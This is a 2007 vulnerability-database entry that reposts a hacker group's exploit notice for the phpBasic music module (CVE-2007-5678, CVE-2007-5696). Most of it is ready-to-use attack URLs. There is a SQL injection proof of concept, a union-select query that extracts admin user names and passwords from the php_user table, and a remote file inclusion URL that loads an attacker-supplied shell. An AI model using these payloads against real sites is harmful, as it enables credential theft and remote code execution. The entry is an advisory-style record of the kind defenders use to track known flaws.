PHP Basic Multiple Vulnerabilities by Xcross87 & Alucar

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052865 漏洞类型
发布时间 2007-10-25 更新时间 2007-10-25
CVE编号 CVE-2007-5678
CVE-2007-5696
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2007100126
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Software : phpBasic Music Module

Homepage : http://phpbasic.com/

1. SQL Injection by Xcross87 :

Proof of concept :

http://victim.com/phpbasic/?php=music&basic=view&id='[SQL Injection]

Xploit admin user account :

http://victim.com/phpbasic/?php=music&basic=view&id=1+union+select+0,1,u
ser_name,3,user_pass,5,6,7,8,9+from+php_user/*%20%3C+

2. RFI by Alucar

Xploit :

http://victim.com/phpbasic/includes.php?root=[HCE_Shell]

=== ..::Xcross87::.. | ..::Alucar::.. | HCETeam Xploiter | HCEGroup.Vn ===